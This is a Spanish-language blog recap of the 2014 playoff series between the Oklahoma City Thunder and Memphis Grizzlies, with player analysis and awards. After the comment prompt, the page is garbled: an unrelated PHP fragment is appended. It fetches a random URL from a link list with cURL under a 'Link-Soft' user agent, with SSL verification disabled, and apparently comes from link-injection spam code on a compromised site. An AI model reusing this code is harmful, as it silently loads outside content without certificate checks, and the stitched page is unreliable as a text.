PO 2014: Resumen Oklahoma City Thunder 4 – Memphis Grizzlies 3

05 de May de 2014 por TheDeerHunter

Preciosa eliminatoria con dos estilos contrapuestos y espíritu de revancha. En juego estaba la eliminación de todo un MVP porque ya ha trascendido que efectivamente Durant destronará a LeBron. Por un lado hubiera sido una lástima el adiós de un hombre que no sólo puede discutirle el premio de mejor jugador a LeBron, sino igual hasta el campeonato. Por el otro hubiera supuesto una morbosa satisfacción verle gozar de unas vacaciones anticipadas con la estatuilla bajo el brazo por culpa de un rival a priori inferior.

Siendo honestos, en su día no llegamos a creer seriamente que estos Grizzlies pudieran suponer una amenaza real a todo un candidato al anillo. Les hemos visto todo el curso un peldaño por debajo de su nivel óptimo aunque ya advertimos que llegaban muy fuertes a este momento al haber tenido que competir al máximo antes de tiempo para asegurar su plaza. La cuestión más delicada en nuestra previa giraba entorno a la duda de si estaban en disposición de disputarle la victoria a los Thunder jugando a más de 90 puntos. A fe mía que lo lograron, aunque para ello necesitaran una prórroga cada vez. Su gran mérito ha sido bajar en más de 4 puntos los promedios de anotación rival, prórrogas incluidas. Nadie contaba que uno de los mejores anotadores que hayan existido, en el mejor estado de forma de su carrera, se iba a encontrar en una crisis existencial semejante. Kevin Durant puede respirar ahora porque durante estas dos semanas el único aliento que ha sentido es el de Tony Allen en su nuca.

También nos intrigaba ver si David Joerger estaría a la altura ya que soportaba el peso adicional de la herencia recibida. Le hemos visto bien, incluso con un punto de frescura ofensiva y variantes que le faltaban a su predecesor. Nada que reprocharle. 

La gran diferencia de la serie con respecto a la del año pasado, además de la sanción sin precedentes a Zach Randolph para el último partido, ha sido Russell Westbrook. Confieso que viéndole siempre tengo la sensación de que hay momentos en los que logra desconectar a sus compañeros debido a la cantidad de juego que absorbe. Además, tiene tendencia a la precipitación y el desorden, que no siempre son idóneos, especialmente contra equipos armados defensivamente como son los Grizzlies. Por otro lado, su velocidad y agresividad suponen un quebradero de cabeza para cualquiera. En cuanto los Grizzlies, por uno u otro motivo, bajaban puntualmente su nivel defensivo, él lograba aprovecharlo. Además, al final de la fiesta cerraba la serie con un notable promedio de asistencias, superior al de la temporada regular.

En definitiva, que los Grizzlies no han hecho saltar la banca por el canto de un duro y se marchan de vacaciones con la cabeza muy alta. Los Thunder, por su parte, tienen la fortuna de que el rival de turno lo ha pasado tan mal como ellos y después de un hueso como éste cualquier situación parece una balsa de aceite.

PREMIOS

MVP: Sin haber estado especialmente precisos de cara al aro ninguno de los dos, Kevin Durant y Russell Westbrook han necesitado el mayor de sus esfuerzos para superar esta prueba. Con todo, exceptuando los porcentajes de acierto, los números son brutales. Entre ambos 55.5 puntos, 19.3 rebotes, 11.4 asistencias, 2.3 robos, 2.3 tapones…

Sorpresa: Hay que reconocer el buen recurso de Scott Brooks metiendo a Caron Butler en el quinteto cuando la serie pintaba peor. Sefolosha, sin un par claro sobre el que desplegar su defensa, andaba excesivamente perdido en la serie. Butler afronta el siguiente cruce con una importante dosis de confianza.

Decepción: Intrascendente impacto el de la segunda unidad interior de los Grizzlies, especialmente teniendo en cuenta que su concurso terminó siendo crítico tras la sanción a Z-Bo. Koufos, Leuer y Davis apenas han contado.

Esfuerzo en vano: El error de Zach Randolph en el penúltimo partido deja en solitario a Marc Gasol en este apartado. Él es el alma de este equipo y por fin le hemos visto en forma este curso. Muy sólido toda la serie, tanto en ataque como en defensa. Su exhibición en el primer cuarto del último partido refleja la magnitud de jugador del que estamos hablando. Jamás vimos en su hermano un despliegue de carácter semejante.

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>